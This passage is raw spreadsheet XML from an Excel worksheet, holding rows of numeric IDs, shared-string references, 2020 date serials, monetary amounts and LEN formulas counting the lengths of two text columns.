        <v>24</v>
      </c>
    </row>
    <row r="684" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A684">
        <v>17429</v>
      </c>
      <c r="B684">
        <v>2241</v>
      </c>
      <c r="C684" t="s">
        <v>5775</v>
      </c>
      <c r="D684" t="s">
        <v>9743</v>
      </c>
      <c r="E684">
        <v>16</v>
      </c>
      <c r="F684" t="s">
        <v>9437</v>
      </c>
      <c r="G684" s="1">
        <v>43907</v>
      </c>
      <c r="H684">
        <v>900000</v>
      </c>
      <c r="J684" t="s">
        <v>9785</v>
      </c>
      <c r="K684">
        <f>LEN(I684)</f>
        <v>0</v>
      </c>
      <c r="L684">
        <f>LEN(J684)</f>
        <v>24</v>
      </c>
    </row>
    <row r="685" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A685">
        <v>20346</v>
      </c>
      <c r="B685">
        <v>899</v>
      </c>
      <c r="C685" t="s">
        <v>2943</v>
      </c>
      <c r="D685" t="s">
        <v>10644</v>
      </c>
      <c r="E685">
        <v>26</v>
      </c>
      <c r="F685" t="s">
        <v>10646</v>
      </c>
      <c r="G685" s="1">
        <v>44088</v>
      </c>
      <c r="H685">
        <v>834</v>
      </c>
      <c r="J685" t="s">
        <v>10331</v>
      </c>
      <c r="K685">
        <f>LEN(I685)</f>
        <v>0</v>
      </c>
      <c r="L685">
        <f>LEN(J685)</f>
        <v>24</v>
      </c>
    </row>
    <row r="686" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A686">
        <v>20350</v>
      </c>
      <c r="B686">
        <v>899</v>
      </c>
      <c r="C686" t="s">
        <v>2943</v>
      </c>
      <c r="D686" t="s">
        <v>10644</v>
      </c>
      <c r="E686">
        <v>26</v>
      </c>
      <c r="F686" t="s">
        <v>9681</v>
      </c>
      <c r="G686" s="1">
        <v>44088</v>
      </c>
      <c r="H686">
        <v>0</v>
      </c>
      <c r="J686" t="s">
        <v>10331</v>
      </c>
      <c r="K686">
        <f>LEN(I686)</f>
        <v>0</v>
      </c>
      <c r="L686">
        <f>LEN(J686)</f>
        <v>24</v>
      </c>
    </row>
    <row r="687" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A687">
        <v>21139</v>
      </c>
      <c r="B687">
        <v>2719</v>
      </c>
      <c r="C687" t="s">
        <v>6860</v>
      </c>
      <c r="D687" t="s">
        <v>10823</v>
      </c>
      <c r="E687">
        <v>13</v>
      </c>
      <c r="F687" t="s">
        <v>1030</v>
      </c>
      <c r="G687" s="1">
        <v>44007</v>
      </c>
      <c r="H687">
        <v>0</v>
      </c>
      <c r="J687" t="s">
        <v>11166</v>
      </c>
      <c r="K687">
        <f>LEN(I687)</f>
        <v>0</v>
      </c>
      <c r="L687">
        <f>LEN(J687)</f>
        <v>24</v>
      </c>
    </row>
    <row r="688" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A688">
        <v>20064</v>
      </c>
      <c r="B688">
        <v>1240</v>
      </c>
      <c r="C688" t="s">
        <v>2554</v>
      </c>
      <c r="D688" t="s">
        <v>9781</v>
      </c>
      <c r="E688">
        <v>1</v>
      </c>
      <c r="F688" t="s">
        <v>1746</v>
      </c>
      <c r="G688" s="1">
        <v>43910</v>
      </c>
      <c r="H688">
        <v>0</v>
      </c>
      <c r="I688" t="s">
        <v>10449</v>
      </c>
      <c r="J688" t="s">
        <v>10450</v>
      </c>
      <c r="K688">
        <f>LEN(I688)</f>
        <v>45</v>
      </c>
      <c r="L688">
        <f>LEN(J688)</f>
        <v>23</v>
      </c>
    </row>
    <row r="689" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A689">
        <v>20065</v>
      </c>
      <c r="B689">
        <v>2661</v>
      </c>
      <c r="C689" t="s">
        <v>3761</v>
      </c>
      <c r="D689" t="s">
        <v>10451</v>
      </c>
      <c r="E689">
        <v>32</v>
      </c>
      <c r="F689" t="s">
        <v>3763</v>
      </c>
      <c r="G689" s="1">
        <v>43908</v>
      </c>
      <c r="H689">
        <v>360000</v>
      </c>
      <c r="I689" t="s">
        <v>9693</v>
      </c>
      <c r="J689" t="s">
        <v>10452</v>
      </c>
      <c r="K689">
        <f>LEN(I689)</f>
        <v>33</v>
      </c>
      <c r="L689">
        <f>LEN(J689)</f>
        <v>23</v>
      </c>
    </row>
    <row r="690" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A690">
        <v>20790</v>
      </c>
      <c r="B690">
        <v>2792</v>
      </c>
      <c r="C690" t="s">
        <v>6992</v>
      </c>
      <c r="D690" t="s">
        <v>10984</v>
      </c>
      <c r="E690">
        <v>32</v>
      </c>
      <c r="F690" t="s">
        <v>2236</v>
      </c>
      <c r="G690" s="1">
        <v>43950</v>
      </c>
      <c r="H690">
        <v>960000</v>
      </c>
      <c r="I690" t="s">
        <v>9536</v>
      </c>
      <c r="J690" t="s">
        <v>10452</v>
      </c>
      <c r="K690">
        <f>LEN(I690)</f>
        <v>13</v>
      </c>
      <c r="L690">
        <f>LEN(J690)</f>
        <v>23</v>
      </c>
    </row>
    <row r="691" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A691">
        <v>19411</v>
      </c>
      <c r="B691">
        <v>1178</v>
      </c>
      <c r="C691" t="s">
        <v>2668</v>
      </c>
      <c r="D691" t="s">
        <v>10013</v>
      </c>
      <c r="E691">
        <v>26</v>
      </c>
      <c r="F691" t="s">
        <v>9929</v>
      </c>
      <c r="G691" s="1">
        <v>43875</v>
      </c>
      <c r="H691">
        <v>100000</v>
      </c>
      <c r="I691" t="s">
        <v>10014</v>
      </c>
      <c r="J691" t="s">
        <v>10015</v>
      </c>
      <c r="K691">
        <f>LEN(I691)</f>
        <v>56</v>
      </c>
      <c r="L691">
        <f>LEN(J691)</f>
        <v>22</v>
      </c>
    </row>
    <row r="692" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A692">
        <v>19265</v>
      </c>
      <c r="B692">
        <v>2362</v>
      </c>
      <c r="C692" t="s">
        <v>4825</v>
      </c>
      <c r="D692" t="s">
        <v>9886</v>
      </c>
      <c r="E692">
        <v>16</v>
      </c>
      <c r="F692" t="s">
        <v>9888</v>
      </c>
      <c r="G692" s="1">
        <v>43878</v>
      </c>
      <c r="H692">
        <v>13000</v>
      </c>
      <c r="J692" t="s">
        <v>9889</v>
      </c>
      <c r="K692">
        <f>LEN(I692)</f>
        <v>0</v>
      </c>
      <c r="L692">
        <f>LEN(J692)</f>
        <v>22</v>
      </c>
    </row>
    <row r="693" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A693">
        <v>19266</v>
      </c>
      <c r="B693">
        <v>2362</v>
      </c>
      <c r="C693" t="s">
        <v>4825</v>
      </c>
      <c r="D693" t="s">
        <v>9886</v>
      </c>
      <c r="E693">
        <v>16</v>
      </c>
      <c r="F693" t="s">
        <v>9437</v>
      </c>
      <c r="G693" s="1">
        <v>43878</v>
      </c>
      <c r="H693">
        <v>42000</v>
      </c>
      <c r="J693" t="s">
        <v>9889</v>
      </c>
      <c r="K693">
        <f>LEN(I693)</f>
        <v>0</v>
      </c>
      <c r="L693">
        <f>LEN(J693)</f>
        <v>22</v>
      </c>
    </row>
    <row r="694" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A694">
        <v>19454</v>
      </c>
      <c r="B694">
        <v>2337</v>
      </c>
      <c r="C694" t="s">
        <v>5129</v>
      </c>
      <c r="D694" t="s">
        <v>10053</v>
      </c>
      <c r="E694">
        <v>12</v>
      </c>
      <c r="F694" t="s">
        <v>10055</v>
      </c>
      <c r="G694" s="1">
        <v>44011</v>
      </c>
      <c r="H694">
        <v>180000</v>
      </c>
      <c r="J694" t="s">
        <v>10056</v>
      </c>
      <c r="K694">
        <f>LEN(I694)</f>
        <v>0</v>
      </c>
      <c r="L694">
        <f>LEN(J694)</f>
        <v>22</v>
      </c>
    </row>
    <row r="695" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A695">
        <v>20052</v>
      </c>
      <c r="B695">
        <v>2669</v>
      </c>
      <c r="C695" t="s">
        <v>5588</v>
      </c>
      <c r="D695" t="s">
        <v>10434</v>
      </c>
      <c r="E695">
        <v>12</v>
      </c>
      <c r="F695" t="s">
        <v>10441</v>
      </c>
      <c r="G695" s="1">
        <v>43928</v>
      </c>
      <c r="H695">
        <v>5506</v>
      </c>
      <c r="I695" t="s">
        <v>10442</v>
      </c>
      <c r="J695" t="s">
        <v>10443</v>
      </c>
      <c r="K695">
        <f>LEN(I695)</f>
        <v>20</v>
      </c>
      <c r="L695">
        <f>LEN(J695)</f>
        <v>21</v>
      </c>
    </row>
    <row r="696" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A696">
        <v>19300</v>
      </c>
      <c r="B696">
        <v>908</v>
      </c>
      <c r="C696" t="s">
        <v>2612</v>
      </c>
      <c r="D696" t="s">
        <v>9903</v>
      </c>
      <c r="E696">
        <v>10</v>
      </c>
      <c r="F696" t="s">
        <v>9904</v>
      </c>
      <c r="G696" s="1">
        <v>43914</v>
      </c>
      <c r="H696">
        <v>45000</v>
      </c>
      <c r="J696" t="s">
        <v>9905</v>
      </c>
      <c r="K696">
        <f>LEN(I696)</f>
        <v>0</v>
      </c>
      <c r="L696">
        <f>LEN(J696)</f>
        <v>21</v>
      </c>
    </row>
    <row r="697" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A697">
        <v>19453</v>
      </c>
      <c r="B697">
        <v>2337</v>
      </c>
      <c r="C697" t="s">
        <v>16323</v>
      </c>
      <c r="D697" t="s">
        <v>16324</v>
      </c>
      <c r="E697">
        <v>12</v>
      </c>
      <c r="F697" t="s">
        <v>2236</v>
      </c>
      <c r="G697" s="1">
        <v>44011</v>
      </c>
      <c r="H697" s="4">
        <v>150000</v>
      </c>
      <c r="J697" t="s">
        <v>10054</v>
      </c>
      <c r="K697">
        <f>LEN(I697)</f>
        <v>0</v>
      </c>
      <c r="L697">
        <f>LEN(J697)</f>
        <v>21</v>
      </c>
    </row>
    <row r="698" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A698">
        <v>20328</v>
      </c>
      <c r="B698">
        <v>830</v>
      </c>
      <c r="C698" t="s">
        <v>16311</v>
      </c>
      <c r="D698" t="s">
        <v>16312</v>
      </c>
      <c r="E698">
        <v>14</v>
      </c>
      <c r="F698" t="s">
        <v>10007</v>
      </c>
      <c r="G698" s="1">
        <v>44046</v>
      </c>
      <c r="H698">
        <v>1009620.51</v>
      </c>
      <c r="J698" t="s">
        <v>10631</v>
      </c>
      <c r="K698">
        <f>LEN(I698)</f>
        <v>0</v>
      </c>
      <c r="L698">
        <f>LEN(J698)</f>
        <v>21</v>
      </c>
    </row>
    <row r="699" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A699">
        <v>20463</v>
      </c>
      <c r="B699">
        <v>2082</v>
      </c>
      <c r="C699" t="s">
        <v>5801</v>
      </c>
      <c r="D699" t="s">
        <v>10731</v>
      </c>
      <c r="E699">
        <v>13</v>
      </c>
      <c r="F699" t="s">
        <v>1746</v>
      </c>
      <c r="G699" s="1">
        <v>44123</v>
      </c>
      <c r="H699">
        <v>150</v>
      </c>
      <c r="I699" t="s">
        <v>10029</v>
      </c>
      <c r="J699" t="s">
        <v>10738</v>
      </c>
      <c r="K699">
        <f>LEN(I699)</f>
        <v>233</v>
      </c>
      <c r="L699">
        <f>LEN(J699)</f>
        <v>20</v>
      </c>
    </row>
    <row r="700" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A700">
        <v>21368</v>
      </c>
      <c r="B700">
        <v>469</v>
      </c>
      <c r="C700" t="s">
        <v>1626</v>
      </c>
      <c r="D700" t="s">
        <v>11336</v>
      </c>
      <c r="E700">
        <v>12</v>
      </c>
      <c r="F700" t="s">
        <v>11337</v>
      </c>
      <c r="G700" s="1">
        <v>44075</v>
      </c>
      <c r="H700">
        <v>155500</v>
      </c>
      <c r="I700" t="s">
        <v>11338</v>
      </c>
      <c r="J700" t="s">
        <v>10738</v>
      </c>
      <c r="K700">
        <f>LEN(I700)</f>
        <v>34</v>
      </c>
      <c r="L700">
        <f>LEN(J700)</f>
        <v>20</v>
      </c>
    </row>
    <row r="701" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A701">
        <v>19397</v>
      </c>
      <c r="B701">
        <v>2347</v>
      </c>
      <c r="C701" t="s">
        <v>5074</v>
      </c>
      <c r="D701" t="s">
        <v>9897</v>
      </c>
      <c r="E701">
        <v>31</v>
      </c>
      <c r="F701" t="s">
        <v>4686</v>
      </c>
      <c r="G701" s="1">
        <v>43867</v>
      </c>
      <c r="H701">
        <v>0</v>
      </c>
      <c r="I701" t="s">
        <v>10003</v>
      </c>
      <c r="J701" t="s">
        <v>9679</v>
      </c>
      <c r="K701">
        <f>LEN(I701)</f>
        <v>33</v>
      </c>
      <c r="L701">
        <f>LEN(J701)</f>
        <v>20</v>
      </c>
    </row>
    <row r="702" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A702">
        <v>19398</v>
      </c>
      <c r="B702">
        <v>2347</v>
      </c>
      <c r="C702" t="s">
        <v>5074</v>
      </c>
      <c r="D702" t="s">
        <v>9897</v>
      </c>
      <c r="E702">
        <v>31</v>
      </c>
      <c r="F702" t="s">
        <v>2236</v>
      </c>
      <c r="G702" s="1">
        <v>43867</v>
      </c>
      <c r="H702">
        <v>0</v>
      </c>
      <c r="I702" t="s">
        <v>10003</v>
      </c>
      <c r="J702" t="s">
        <v>9679</v>
      </c>
      <c r="K702">
        <f>LEN(I702)</f>
        <v>33</v>
      </c>
      <c r="L702">
        <f>LEN(J702)</f>
        <v>20</v>
      </c>
    </row>
    <row r="703" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A703">
        <v>19399</v>
      </c>
      <c r="B703">
        <v>2347</v>
      </c>
      <c r="C703" t="s">
        <v>5074</v>
      </c>
      <c r="D703" t="s">
        <v>9897</v>
      </c>
      <c r="E703">
        <v>31</v>
      </c>
      <c r="F703" t="s">
        <v>3763</v>
      </c>
      <c r="G703" s="1">
        <v>43867</v>
      </c>
      <c r="H703">
        <v>0</v>
      </c>
      <c r="I703" t="s">
        <v>10003</v>
      </c>
      <c r="J703" t="s">
        <v>9679</v>
      </c>
      <c r="K703">
        <f>LEN(I703)</f>
        <v>33</v>
      </c>
      <c r="L703">
        <f>LEN(J703)</f>
        <v>20</v>
      </c>
    </row>
    <row r="704" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A704">
        <v>19400</v>
      </c>
      <c r="B704">
        <v>2347</v>
      </c>
      <c r="C704" t="s">
        <v>5074</v>
      </c>
      <c r="D704" t="s">
        <v>9897</v>
      </c>
      <c r="E704">
        <v>31</v>
      </c>
      <c r="F704" t="s">
        <v>6917</v>
      </c>
      <c r="G704" s="1">
        <v>43867</v>
      </c>
      <c r="H704">
        <v>0</v>
      </c>
      <c r="I704" t="s">
        <v>10003</v>
      </c>
      <c r="J704" t="s">
        <v>9679</v>
      </c>
      <c r="K704">
        <f>LEN(I704)</f>
        <v>33</v>
      </c>
      <c r="L704">
        <f>LEN(J704)</f>
        <v>20</v>
      </c>
    </row>
    <row r="705" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A705">
        <v>19401</v>
      </c>
      <c r="B705">
        <v>2347</v>
      </c>
      <c r="C705" t="s">
        <v>5074</v>
      </c>
      <c r="D705" t="s">
        <v>9897</v>
      </c>
      <c r="E705">
        <v>31</v>
      </c>
      <c r="F705" t="s">
        <v>10004</v>
      </c>
      <c r="G705" s="1">
        <v>43867</v>
      </c>
      <c r="H705">
        <v>0</v>
      </c>
      <c r="I705" t="s">
        <v>10003</v>
      </c>
      <c r="J705" t="s">
        <v>9679</v>
      </c>
      <c r="K705">
        <f>LEN(I705)</f>
        <v>33</v>
      </c>
      <c r="L705">
        <f>LEN(J705)</f>
        <v>20</v>
      </c>
    </row>
    <row r="706" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A706">
        <v>19621</v>
      </c>
      <c r="B706">
        <v>610</v>
      </c>
      <c r="C706" t="s">
        <v>327</v>
      </c>
      <c r="D706" t="s">
        <v>9969</v>
      </c>
      <c r="E706">
        <v>26</v>
      </c>
      <c r="F706" t="s">
        <v>9585</v>
      </c>
      <c r="G706" s="1">
        <v>43923</v>
      </c>
      <c r="H706">
        <v>30000</v>
      </c>
      <c r="I706" t="s">
        <v>10003</v>
      </c>
      <c r="J706" t="s">
        <v>9679</v>
      </c>
      <c r="K706">
        <f>LEN(I706)</f>
        <v>33</v>
      </c>
      <c r="L706">
        <f>LEN(J706)</f>
        <v>20</v>
      </c>
    </row>
    <row r="707" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A707">
        <v>19236</v>
      </c>
      <c r="B707">
        <v>2522</v>
      </c>
      <c r="C707" t="s">
        <v>4763</v>
      </c>
      <c r="D707" t="s">
        <v>9853</v>
      </c>
      <c r="E707">
        <v>29</v>
      </c>
      <c r="F707" t="s">
        <v>2236</v>
      </c>
      <c r="G707" s="1">
        <v>43865</v>
      </c>
      <c r="H707">
        <v>0</v>
      </c>
      <c r="I707" t="s">
        <v>9854</v>
      </c>
      <c r="J707" t="s">
        <v>9679</v>
      </c>
      <c r="K707">
        <f>LEN(I707)</f>
        <v>26</v>
      </c>
      <c r="L707">
        <f>LEN(J707)</f>
        <v>20</v>
      </c>
    </row>
    <row r="708" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A708">
        <v>19237</v>
      </c>
      <c r="B708">
        <v>2522</v>
      </c>
      <c r="C708" t="s">
        <v>4763</v>
      </c>
      <c r="D708" t="s">
        <v>9853</v>
      </c>
      <c r="E708">
        <v>29</v>
      </c>
      <c r="F708" t="s">
        <v>3763</v>
      </c>
      <c r="G708" s="1">
        <v>43865</v>
      </c>
      <c r="H708">
        <v>0</v>
      </c>
      <c r="I708" t="s">
        <v>9854</v>
      </c>
      <c r="J708" t="s">
        <v>9679</v>
      </c>
      <c r="K708">
        <f>LEN(I708)</f>
        <v>26</v>
      </c>
      <c r="L708">
        <f>LEN(J708)</f>
        <v>20</v>
      </c>
    </row>
    <row r="709" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A709">
        <v>19238</v>
      </c>
      <c r="B709">
        <v>2522</v>
      </c>
      <c r="C709" t="s">
        <v>4763</v>
      </c>
      <c r="D709" t="s">
        <v>9853</v>
      </c>
      <c r="E709">
        <v>29</v>
      </c>
      <c r="F709" t="s">
        <v>9855</v>
      </c>
      <c r="G709" s="1">
        <v>43865</v>
      </c>
      <c r="H709">
        <v>0</v>
      </c>
      <c r="I709" t="s">
        <v>9854</v>
      </c>
      <c r="J709" t="s">
        <v>9679</v>
      </c>
      <c r="K709">
        <f>LEN(I709)</f>
        <v>26</v>
      </c>
      <c r="L709">
        <f>LEN(J709)</f>
        <v>20</v>
      </c>
    </row>
    <row r="710" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A710">
        <v>21057</v>
      </c>
      <c r="B710">
        <v>2755</v>
      </c>
      <c r="C710" t="s">
        <v>1838</v>
      </c>
      <c r="D710" t="s">
        <v>11118</v>
      </c>
      <c r="E710">
        <v>12</v>
      </c>
      <c r="F710" t="s">
        <v>673</v>
      </c>
      <c r="G710" s="1">
        <v>44081</v>
      </c>
      <c r="H710">
        <v>1720000</v>
      </c>
      <c r="I710" t="s">
        <v>10442</v>
      </c>
      <c r="J710" t="s">
        <v>9679</v>
      </c>
      <c r="K710">
        <f>LEN(I710)</f>
        <v>20</v>
      </c>
      <c r="L710">
        <f>LEN(J710)</f>
        <v>20</v>
      </c>
    </row>
    <row r="711" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A711">
        <v>19622</v>
      </c>
      <c r="B711">
        <v>610</v>
      </c>
      <c r="C711" t="s">
        <v>327</v>
      </c>
      <c r="D711" t="s">
        <v>9969</v>
      </c>
      <c r="E711">
        <v>26</v>
      </c>
      <c r="F711" t="s">
        <v>9586</v>
      </c>
      <c r="G711" s="1">
        <v>43923</v>
      </c>
      <c r="H711">
        <v>30000</v>
      </c>
      <c r="I711" t="s">
        <v>9952</v>
      </c>
      <c r="J711" t="s">
        <v>9679</v>
      </c>
      <c r="K711">
        <f>LEN(I711)</f>
        <v>18</v>
      </c>
      <c r="L711">
        <f>LEN(J711)</f>
        <v>20</v>
      </c>
    </row>
    <row r="712" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A712">
        <v>20951</v>
      </c>
      <c r="B712">
        <v>532</v>
      </c>
      <c r="C712" t="s">
        <v>982</v>
      </c>
      <c r="D712" t="s">
        <v>10675</v>
      </c>
      <c r="E712">
        <v>12</v>
      </c>
      <c r="F712" t="s">
        <v>11075</v>
      </c>
      <c r="G712" s="1">
        <v>43966</v>
      </c>
      <c r="H712">
        <v>1500</v>
      </c>
      <c r="I712" t="s">
        <v>9550</v>
      </c>
      <c r="J712" t="s">
        <v>10437</v>
      </c>
      <c r="K712">
        <f>LEN(I712)</f>
        <v>18</v>
      </c>
      <c r="L712">
        <f>LEN(J712)</f>
        <v>20</v>
      </c>
    </row>
    <row r="713" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A713">
        <v>21237</v>
      </c>
      <c r="B713">
        <v>1155</v>
      </c>
      <c r="C713" t="s">
        <v>16325</v>
      </c>
      <c r="D713" t="s">
        <v>16326</v>
      </c>
      <c r="E713">
        <v>10</v>
      </c>
      <c r="F713" t="s">
        <v>673</v>
      </c>
      <c r="G713" s="1">
        <v>44019</v>
      </c>
      <c r="H713">
        <v>1463386.5</v>
      </c>
      <c r="I713" t="s">
        <v>9485</v>
      </c>
      <c r="J713" t="s">
        <v>9679</v>
      </c>
      <c r="K713">
        <f>LEN(I713)</f>
        <v>18</v>
      </c>
      <c r="L713">
        <f>LEN(J713)</f>
        <v>20</v>
      </c>
    </row>
    <row r="714" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A714">
        <v>21238</v>
      </c>
      <c r="B714">
        <v>1155</v>
      </c>
      <c r="C714" t="s">
        <v>16325</v>
      </c>
      <c r="D714" t="s">
        <v>16326</v>
      </c>
      <c r="E714">
        <v>10</v>
      </c>
      <c r="F714" t="s">
        <v>10007</v>
      </c>
      <c r="G714" s="1">
        <v>44019</v>
      </c>
      <c r="H714">
        <v>1463386.5</v>
      </c>
      <c r="I714" t="s">
        <v>9485</v>
      </c>
      <c r="J714" t="s">
        <v>9679</v>
      </c>
      <c r="K714">
        <f>LEN(I714)</f>
        <v>18</v>
      </c>
      <c r="L714">
        <f>LEN(J714)</f>
        <v>20</v>
      </c>
    </row>
    <row r="715" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A715">
        <v>20023</v>
      </c>
      <c r="B715">
        <v>990</v>
      </c>
      <c r="C715" t="s">
        <v>2847</v>
      </c>
      <c r="D715" t="s">
        <v>10401</v>
      </c>
      <c r="E715">
        <v>9</v>
      </c>
      <c r="F715" t="s">
        <v>9722</v>
      </c>
      <c r="G715" s="1">
        <v>43889</v>
      </c>
      <c r="H715">
        <v>0</v>
      </c>
      <c r="I715" t="s">
        <v>9933</v>
      </c>
      <c r="J715" t="s">
        <v>10404</v>
      </c>
      <c r="K715">
        <f>LEN(I715)</f>
        <v>16</v>
      </c>
      <c r="L715">
        <f>LEN(J715)</f>
        <v>20</v>
      </c>
    </row>
    <row r="716" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A716">
        <v>20026</v>
      </c>
      <c r="B716">
        <v>1611</v>
      </c>
      <c r="C716" t="s">
        <v>2858</v>
      </c>
      <c r="D716" t="s">
        <v>10408</v>
      </c>
      <c r="E716">
        <v>16</v>
      </c>
      <c r="F716" t="s">
        <v>673</v>
      </c>
      <c r="G716" s="1">
        <v>43969</v>
      </c>
      <c r="H716">
        <v>50000</v>
      </c>
      <c r="I716" t="s">
        <v>10409</v>
      </c>
      <c r="J716" t="s">
        <v>9679</v>
      </c>
      <c r="K716">
        <f>LEN(I716)</f>
        <v>16</v>
      </c>
      <c r="L716">
        <f>LEN(J716)</f>
        <v>20</v>
      </c>
    </row>
    <row r="717" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A717">
        <v>19603</v>
      </c>
      <c r="B717">
        <v>2522</v>
      </c>
      <c r="C717" t="s">
        <v>4763</v>
      </c>
      <c r="D717" t="s">
        <v>9853</v>
      </c>
      <c r="E717">
        <v>29</v>
      </c>
      <c r="F717" t="s">
        <v>10125</v>
      </c>
      <c r="G717" s="1">
        <v>43865</v>
      </c>
      <c r="H717">
        <v>0</v>
      </c>
      <c r="I717" t="s">
        <v>9746</v>
      </c>
      <c r="J717" t="s">
        <v>9679</v>
      </c>
      <c r="K717">
        <f>LEN(I717)</f>
        <v>13</v>
      </c>
      <c r="L717">
        <f>LEN(J717)</f>
        <v>20</v>
      </c>
    </row>
    <row r="718" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A718">
        <v>19605</v>
      </c>
      <c r="B718">
        <v>2522</v>
      </c>
      <c r="C718" t="s">
        <v>4763</v>
      </c>
      <c r="D718" t="s">
        <v>9853</v>
      </c>
      <c r="E718">
        <v>29</v>
      </c>
      <c r="F718" t="s">
        <v>4686</v>
      </c>
      <c r="G718" s="1">
        <v>43865</v>
      </c>
      <c r="H718">
        <v>0</v>
      </c>
      <c r="I718" t="s">
        <v>9746</v>
      </c>
      <c r="J718" t="s">
        <v>9679</v>
      </c>
      <c r="K718">
        <f>LEN(I718)</f>
        <v>13</v>
      </c>
      <c r="L718">
        <f>LEN(J718)</f>
        <v>20</v>
      </c>
    </row>
    <row r="719" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A719">
        <v>19613</v>
      </c>
      <c r="B719">
        <v>2522</v>
      </c>
      <c r="C719" t="s">
        <v>4763</v>
      </c>
      <c r="D719" t="s">
        <v>9853</v>
      </c>
      <c r="E719">
        <v>29</v>
      </c>
      <c r="F719" t="s">
        <v>10128</v>
      </c>
      <c r="G719" s="1">
        <v>43865</v>
      </c>
      <c r="H719">
        <v>0</v>
      </c>
      <c r="I719" t="s">
        <v>9746</v>
      </c>
      <c r="J719" t="s">
        <v>9679</v>
      </c>
      <c r="K719">
        <f>LEN(I719)</f>
        <v>13</v>
      </c>
      <c r="L719">
        <f>LEN(J719)</f>
        <v>20</v>
      </c>
    </row>
    <row r="720" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A720">
        <v>17136</v>
      </c>
      <c r="B720">
        <v>368</v>
      </c>
      <c r="C720" t="s">
        <v>1436</v>
      </c>
      <c r="D720" t="s">
        <v>9671</v>
      </c>
      <c r="E720">
        <v>14</v>
      </c>
      <c r="F720" t="s">
        <v>9678</v>
      </c>
      <c r="G720" s="1">
        <v>43871</v>
      </c>
      <c r="H720">
        <v>175000</v>
      </c>
      <c r="J720" t="s">
        <v>9679</v>
      </c>
      <c r="K720">
        <f>LEN(I720)</f>
        <v>0</v>
      </c>
      <c r="L720">
        <f>LEN(J720)</f>
        <v>20</v>
      </c>
    </row>
    <row r="721" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A721">
        <v>19609</v>
      </c>
      <c r="B721">
        <v>2522</v>
      </c>
      <c r="C721" t="s">
        <v>4763</v>
      </c>
      <c r="D721" t="s">
        <v>9853</v>
      </c>
      <c r="E721">
        <v>29</v>
      </c>
      <c r="F721" t="s">
        <v>7241</v>
      </c>
      <c r="G721" s="1">
        <v>43865</v>
      </c>
      <c r="H721">
        <v>0</v>
      </c>
      <c r="J721" t="s">
        <v>9679</v>
      </c>
      <c r="K721">
        <f>LEN(I721)</f>
        <v>0</v>
      </c>
      <c r="L721">
        <f>LEN(J721)</f>
        <v>20</v>
      </c>
    </row>
    <row r="722" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A722">
        <v>19610</v>
      </c>
      <c r="B722">
        <v>2522</v>
      </c>
      <c r="C722" t="s">
        <v>4763</v>
      </c>
      <c r="D722" t="s">
        <v>9853</v>
      </c>
      <c r="E722">
        <v>29</v>
      </c>
      <c r="F722" t="s">
        <v>10127</v>
      </c>
      <c r="G722" s="1">
        <v>43865</v>
      </c>
      <c r="H722">
        <v>0</v>
      </c>
      <c r="J722" t="s">
        <v>9679</v>
      </c>
      <c r="K722">
        <f>LEN(I722)</f>
        <v>0</v>
      </c>
      <c r="L722">
        <f>LEN(J722)</f>
        <v>20</v>
      </c>
    </row>
    <row r="723" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A723">
        <v>19611</v>
      </c>
      <c r="B723">
        <v>2522</v>
      </c>
      <c r="C723" t="s">
        <v>4763</v>
      </c>
      <c r="D723" t="s">
        <v>9853</v>
      </c>
      <c r="E723">
        <v>29</v>
      </c>
      <c r="F723" t="s">
        <v>9851</v>
      </c>
      <c r="G723" s="1">
        <v>43865</v>
      </c>
      <c r="H723">
        <v>0</v>
      </c>
      <c r="J723" t="s">
        <v>9679</v>
      </c>
      <c r="K723">
        <f>LEN(I723)</f>
        <v>0</v>
      </c>
      <c r="L723">
        <f>LEN(J723)</f>
        <v>20</v>
      </c>
    </row>
    <row r="724" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A724">
        <v>19612</v>
      </c>
      <c r="B724">
        <v>2522</v>
      </c>
      <c r="C724" t="s">
        <v>4763</v>
      </c>
      <c r="D724" t="s">
        <v>9853</v>
      </c>
      <c r="E724">
        <v>29</v>
      </c>
      <c r="F724" t="s">
        <v>9672</v>
      </c>
      <c r="G724" s="1">
        <v>43865</v>
      </c>
      <c r="H724">
        <v>0</v>
      </c>
      <c r="J724" t="s">
        <v>9679</v>
      </c>
      <c r="K724">
        <f>LEN(I724)</f>
        <v>0</v>
      </c>
      <c r="L724">
        <f>LEN(J724)</f>
        <v>20</v>
      </c>
    </row>
    <row r="725" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A725">
        <v>19708</v>
      </c>
      <c r="B725">
        <v>760</v>
      </c>
      <c r="C725" t="s">
